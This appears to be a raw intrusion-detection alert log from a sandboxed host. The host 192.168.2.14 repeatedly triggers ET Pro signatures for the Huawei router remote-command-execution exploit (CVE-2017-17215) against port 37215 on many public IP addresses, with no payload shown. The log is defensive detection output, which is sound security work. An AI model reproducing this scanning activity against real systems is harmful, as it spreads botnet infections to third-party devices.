                                                    07/10/24-08:27:02.952758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485437215192.168.2.14157.138.9.161
                                                    07/10/24-08:27:11.512071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4766637215192.168.2.14157.198.206.98
                                                    07/10/24-08:27:22.900850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.14129.225.98.156
                                                    07/10/24-08:26:36.406451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545637215192.168.2.14157.124.237.216
                                                    07/10/24-08:26:55.359500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221437215192.168.2.14157.115.10.199
                                                    07/10/24-08:26:31.054744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170637215192.168.2.14157.207.151.118
                                                    07/10/24-08:26:52.018134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625237215192.168.2.14157.222.23.227
                                                    07/10/24-08:27:00.478130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099837215192.168.2.14157.126.173.183
                                                    07/10/24-08:26:33.251100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296437215192.168.2.14157.61.129.124
                                                    07/10/24-08:26:45.652788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332237215192.168.2.14157.136.138.244
                                                    07/10/24-08:27:02.939930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496037215192.168.2.1441.242.227.174
                                                    07/10/24-08:26:59.644230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181837215192.168.2.14157.17.80.42
                                                    07/10/24-08:26:14.813637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4962237215192.168.2.14197.14.180.236
                                                    07/10/24-08:27:22.877679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762237215192.168.2.14113.185.175.46
                                                    07/10/24-08:26:33.213078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656237215192.168.2.14197.166.249.118
                                                    07/10/24-08:27:20.520093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899637215192.168.2.1420.245.220.22
                                                    07/10/24-08:27:23.893533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439037215192.168.2.14157.32.132.238
                                                    07/10/24-08:26:53.189669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026237215192.168.2.14181.253.148.11
                                                    07/10/24-08:26:43.636753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063437215192.168.2.1441.167.39.230
                                                    07/10/24-08:27:13.750468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367037215192.168.2.14197.203.21.140
                                                    07/10/24-08:26:13.850183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459837215192.168.2.14147.231.112.248
                                                    07/10/24-08:26:43.831201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414037215192.168.2.1439.112.13.210
                                                    07/10/24-08:26:13.805292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790037215192.168.2.14157.66.37.83
                                                    07/10/24-08:27:02.791208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303637215192.168.2.14191.114.31.28
                                                    07/10/24-08:26:33.228376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087437215192.168.2.14197.3.225.86
                                                    07/10/24-08:26:14.764309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279837215192.168.2.14157.55.211.110
                                                    07/10/24-08:26:25.433528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042837215192.168.2.14197.184.31.203
                                                    07/10/24-08:26:49.811589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860637215192.168.2.14197.173.68.128
                                                    07/10/24-08:27:13.863039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028637215192.168.2.14157.180.51.70
                                                    07/10/24-08:26:14.792244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543437215192.168.2.1463.136.4.159
                                                    07/10/24-08:27:13.972305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3687437215192.168.2.14157.251.173.82
                                                    07/10/24-08:26:15.811251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023437215192.168.2.14197.170.6.163
                                                    07/10/24-08:27:02.985311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354837215192.168.2.1441.220.89.120
                                                    07/10/24-08:27:19.289200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290837215192.168.2.14157.142.247.1
                                                    07/10/24-08:27:22.564060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550437215192.168.2.14157.241.137.68
                                                    07/10/24-08:27:30.510690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736437215192.168.2.14144.117.74.241
                                                    07/10/24-08:26:11.588722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821637215192.168.2.14108.13.36.194
                                                    07/10/24-08:26:29.874680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445037215192.168.2.14157.149.23.2
                                                    07/10/24-08:26:20.182553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600837215192.168.2.14197.51.168.199
                                                    07/10/24-08:26:52.043481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556437215192.168.2.14210.228.227.188
                                                    07/10/24-08:26:13.847797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630437215192.168.2.1477.99.78.105
                                                    07/10/24-08:26:11.588722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239837215192.168.2.1441.32.89.88
                                                    07/10/24-08:27:13.998046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915037215192.168.2.14157.104.97.136
                                                    07/10/24-08:26:43.861312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412837215192.168.2.14157.138.81.104
                                                    07/10/24-08:26:18.037412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3737437215192.168.2.14135.138.198.88
                                                    07/10/24-08:26:43.574763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504837215192.168.2.1464.77.59.92
                                                    07/10/24-08:27:10.699578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607837215192.168.2.14197.173.19.69
                                                    07/10/24-08:26:28.758809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661237215192.168.2.1441.234.123.200
                                                    07/10/24-08:26:23.279248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021437215192.168.2.14157.159.73.121
                                                    07/10/24-08:26:29.848557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634837215192.168.2.14161.91.153.247
                                                    07/10/24-08:26:59.529956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063237215192.168.2.1491.106.137.5
                                                    07/10/24-08:27:02.730689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612037215192.168.2.14223.127.16.240
                                                    07/10/24-08:26:41.524750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660637215192.168.2.14157.80.147.95
                                                    07/10/24-08:26:11.604858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930837215192.168.2.1441.207.94.39
                                                    07/10/24-08:26:45.652788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636437215192.168.2.14197.118.218.237
                                                    07/10/24-08:26:25.486596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522637215192.168.2.1412.227.213.47
                                                    07/10/24-08:27:07.376641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132037215192.168.2.14157.236.138.155
                                                    07/10/24-08:26:14.740635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518437215192.168.2.14190.127.112.232
                                                    07/10/24-08:27:23.932047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5119437215192.168.2.14157.16.68.212
                                                    07/10/24-08:26:14.626049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754837215192.168.2.1441.161.185.105
                                                    07/10/24-08:27:14.879278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363237215192.168.2.14197.43.155.250
                                                    07/10/24-08:27:02.975587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814237215192.168.2.14157.151.71.96
                                                    07/10/24-08:26:14.624667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696237215192.168.2.14218.155.109.158
                                                    07/10/24-08:26:47.981367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5218037215192.168.2.1441.130.131.118
                                                    07/10/24-08:26:52.051203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683637215192.168.2.1441.81.180.33
                                                    07/10/24-08:27:19.228026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460637215192.168.2.14197.228.130.161
                                                    07/10/24-08:26:45.666714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705437215192.168.2.1441.100.30.255
                                                    07/10/24-08:26:47.851714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5511237215192.168.2.14197.54.119.138
                                                    07/10/24-08:27:28.120047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574637215192.168.2.14197.45.130.166
                                                    07/10/24-08:27:19.336820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753837215192.168.2.14157.131.226.12
                                                    07/10/24-08:27:34.132992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585637215192.168.2.14149.231.132.140
                                                    07/10/24-08:26:34.201699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083637215192.168.2.14197.192.39.60
                                                    07/10/24-08:26:51.988172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825237215192.168.2.1441.43.37.101
                                                    07/10/24-08:27:11.479148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821437215192.168.2.14157.137.55.69
                                                    07/10/24-08:26:15.813781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479437215192.168.2.14197.4.25.173
                                                    07/10/24-08:26:28.880092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664437215192.168.2.14157.84.197.168
                                                    07/10/24-08:26:11.606817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051037215192.168.2.14157.202.85.97
                                                    07/10/24-08:26:41.502919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972437215192.168.2.1441.111.139.76
                                                    07/10/24-08:27:14.861604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164437215192.168.2.1451.163.223.177
                                                    07/10/24-08:26:11.190185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277437215192.168.2.1432.202.29.246
                                                    07/10/24-08:26:17.981782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359837215192.168.2.1441.29.100.92
                                                    07/10/24-08:26:28.651021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131037215192.168.2.14145.148.24.153
                                                    07/10/24-08:26:38.565091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4365837215192.168.2.14197.94.215.8
                                                    07/10/24-08:26:47.783932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488437215192.168.2.14157.180.123.228
                                                    07/10/24-08:26:29.883376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923637215192.168.2.1441.176.173.241
                                                    07/10/24-08:26:15.865668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759037215192.168.2.14157.71.73.207
                                                    07/10/24-08:26:28.750932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882437215192.168.2.14157.34.167.232
                                                    07/10/24-08:27:10.657807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4523437215192.168.2.14157.40.128.250
                                                    07/10/24-08:27:28.153609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442237215192.168.2.14157.80.83.46
                                                    07/10/24-08:26:26.596367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3780637215192.168.2.14197.145.27.208
                                                    07/10/24-08:26:55.332211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810437215192.168.2.14197.255.242.2
                                                    07/10/24-08:26:15.852897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5399637215192.168.2.14141.224.13.91
                                                    07/10/24-08:27:22.564607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479237215192.168.2.14197.51.56.113
                                                    07/10/24-08:26:11.613334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315437215192.168.2.14113.146.63.134
                                                    07/10/24-08:26:25.467613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993637215192.168.2.14195.6.45.58
                                                    07/10/24-08:27:14.885160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379837215192.168.2.14157.83.244.93
                                                    07/10/24-08:26:25.464984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142837215192.168.2.1441.31.254.147
                                                    07/10/24-08:26:57.642327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4941037215192.168.2.1441.98.148.212
                                                    07/10/24-08:26:59.826024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704037215192.168.2.14157.90.109.204
                                                    07/10/24-08:26:45.691273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358037215192.168.2.14157.131.117.160
                                                    07/10/24-08:27:28.035789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927637215192.168.2.14157.249.114.163
                                                    07/10/24-08:27:05.164451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932637215192.168.2.1470.37.124.87
                                                    07/10/24-08:26:18.003215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958037215192.168.2.14192.223.243.110
                                                    07/10/24-08:26:43.610236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4051037215192.168.2.1441.189.89.164
                                                    07/10/24-08:27:24.942131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347237215192.168.2.14197.20.20.178
                                                    07/10/24-08:26:57.521887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4453837215192.168.2.14138.32.139.52
                                                    07/10/24-08:26:59.607972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660637215192.168.2.14157.92.243.158
                                                    07/10/24-08:27:30.487311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3820437215192.168.2.1441.36.207.67
                                                    07/10/24-08:27:28.064051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695637215192.168.2.14223.14.31.84
                                                    07/10/24-08:27:07.249453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4928637215192.168.2.14157.71.49.130
                                                    07/10/24-08:26:28.808876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070237215192.168.2.1474.105.149.99
                                                    07/10/24-08:27:27.067694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183437215192.168.2.1441.145.56.242
                                                    07/10/24-08:26:36.435676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377637215192.168.2.14197.134.41.175
                                                    07/10/24-08:26:59.623766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794637215192.168.2.14197.187.202.26
                                                    07/10/24-08:27:19.343143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853437215192.168.2.14197.251.219.48
                                                    07/10/24-08:26:23.294907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106237215192.168.2.1441.48.200.60
                                                    07/10/24-08:27:05.064753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513437215192.168.2.14197.16.53.221
                                                    07/10/24-08:26:33.221493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765837215192.168.2.14157.188.91.91
                                                    07/10/24-08:27:30.489960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110837215192.168.2.14117.227.122.219
                                                    07/10/24-08:26:57.580617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844837215192.168.2.1441.91.1.59
                                                    07/10/24-08:27:28.139469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098637215192.168.2.14197.212.33.140
                                                    07/10/24-08:27:10.662602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4807837215192.168.2.14157.243.42.30
                                                    07/10/24-08:27:11.558297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4711037215192.168.2.14197.73.199.184
                                                    07/10/24-08:26:59.844972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767637215192.168.2.14197.55.218.143
                                                    07/10/24-08:27:19.157355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662637215192.168.2.14197.227.79.229
                                                    07/10/24-08:27:22.539034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030037215192.168.2.14157.148.33.97
                                                    07/10/24-08:26:14.777046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756437215192.168.2.14167.229.202.68
                                                    07/10/24-08:26:18.027319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437837215192.168.2.14197.30.2.126
                                                    07/10/24-08:26:28.822867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980437215192.168.2.14197.105.214.162
                                                    07/10/24-08:26:43.570242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032637215192.168.2.14157.26.31.91
                                                    07/10/24-08:27:31.448470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087237215192.168.2.1441.162.169.56
                                                    07/10/24-08:26:43.799492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140037215192.168.2.14157.215.173.133
                                                    07/10/24-08:27:05.121354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065237215192.168.2.1470.7.110.129
                                                    07/10/24-08:26:43.923272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3656637215192.168.2.14157.101.46.130
                                                    07/10/24-08:26:34.202638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710237215192.168.2.1452.154.176.143
                                                    07/10/24-08:26:14.823884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586237215192.168.2.14157.230.20.204
                                                    07/10/24-08:26:28.861784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4945837215192.168.2.1476.166.205.133
                                                    07/10/24-08:27:08.375858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913637215192.168.2.1441.38.16.165
                                                    07/10/24-08:27:13.868751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803437215192.168.2.14196.244.115.92
                                                    07/10/24-08:27:14.793732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682437215192.168.2.1441.235.118.210
                                                    07/10/24-08:27:17.084345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596437215192.168.2.1441.113.158.120
                                                    07/10/24-08:26:53.209025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287037215192.168.2.1441.190.26.46
                                                    07/10/24-08:27:11.550512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010637215192.168.2.14197.28.145.112
                                                    07/10/24-08:26:59.765142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810837215192.168.2.14177.139.207.103
                                                    07/10/24-08:27:17.047442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769037215192.168.2.14157.113.43.155
                                                    07/10/24-08:26:38.584123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508837215192.168.2.14157.159.207.101
                                                    07/10/24-08:26:33.177763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565637215192.168.2.14157.185.73.123
                                                    07/10/24-08:26:43.702243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090237215192.168.2.14197.89.183.136
                                                    07/10/24-08:27:30.503122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5179437215192.168.2.1441.168.99.144
                                                    07/10/24-08:26:55.312291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915437215192.168.2.14197.62.34.86
                                                    07/10/24-08:26:45.615423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128637215192.168.2.1441.153.208.216
                                                    07/10/24-08:26:29.881583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929037215192.168.2.14197.81.87.250
                                                    07/10/24-08:26:33.262601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883437215192.168.2.14207.235.117.115
                                                    07/10/24-08:26:55.359500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310637215192.168.2.1441.85.190.133
                                                    07/10/24-08:26:57.672388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735837215192.168.2.1432.28.48.172
                                                    07/10/24-08:26:53.168197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058037215192.168.2.14157.31.101.60
                                                    07/10/24-08:27:19.234449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791037215192.168.2.1441.253.218.163
                                                    07/10/24-08:26:52.027011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317437215192.168.2.14197.20.207.228
                                                    07/10/24-08:26:28.763475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140637215192.168.2.14197.211.24.39
                                                    07/10/24-08:26:26.616728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411837215192.168.2.1441.136.170.166
                                                    07/10/24-08:27:19.339417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309637215192.168.2.14197.128.221.185
                                                    07/10/24-08:27:30.436856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603837215192.168.2.1441.170.24.99
                                                    07/10/24-08:27:31.526577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879237215192.168.2.1441.157.23.22
                                                    07/10/24-08:26:49.900161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4546837215192.168.2.14157.124.104.223
                                                    07/10/24-08:26:38.549884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729637215192.168.2.14197.61.61.6
                                                    07/10/24-08:26:43.901338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555037215192.168.2.1441.243.115.125
                                                    07/10/24-08:26:11.567410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860637215192.168.2.14157.155.92.145
                                                    07/10/24-08:26:43.594845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704037215192.168.2.14197.89.230.4
                                                    07/10/24-08:27:03.040763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946037215192.168.2.14197.18.225.114
                                                    07/10/24-08:26:18.003273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362637215192.168.2.14157.63.212.114
                                                    07/10/24-08:26:17.980540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4545437215192.168.2.14134.182.131.50
                                                    07/10/24-08:26:15.873682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721437215192.168.2.14149.143.60.77
                                                    07/10/24-08:26:17.994829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3532637215192.168.2.14157.168.187.255
                                                    07/10/24-08:27:13.979728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443037215192.168.2.14157.43.26.29
                                                    07/10/24-08:26:22.295095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104437215192.168.2.14197.248.179.96
                                                    07/10/24-08:27:28.046169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595037215192.168.2.1468.248.162.126
                                                    07/10/24-08:26:47.939160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498837215192.168.2.14199.205.228.0
                                                    07/10/24-08:27:27.076918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512637215192.168.2.14197.222.231.145
                                                    07/10/24-08:26:51.997172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977037215192.168.2.1441.167.42.247
                                                    07/10/24-08:27:08.455887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940037215192.168.2.14157.18.211.26
                                                    07/10/24-08:26:59.753614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300037215192.168.2.14157.10.64.164
                                                    07/10/24-08:27:11.516345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4788637215192.168.2.14197.54.164.219
                                                    07/10/24-08:26:31.058542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834637215192.168.2.14157.62.106.221
                                                    07/10/24-08:27:07.397388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039237215192.168.2.1441.227.108.116
                                                    07/10/24-08:26:31.099427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573637215192.168.2.14197.58.128.32
                                                    07/10/24-08:27:08.415966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831437215192.168.2.14157.40.117.187
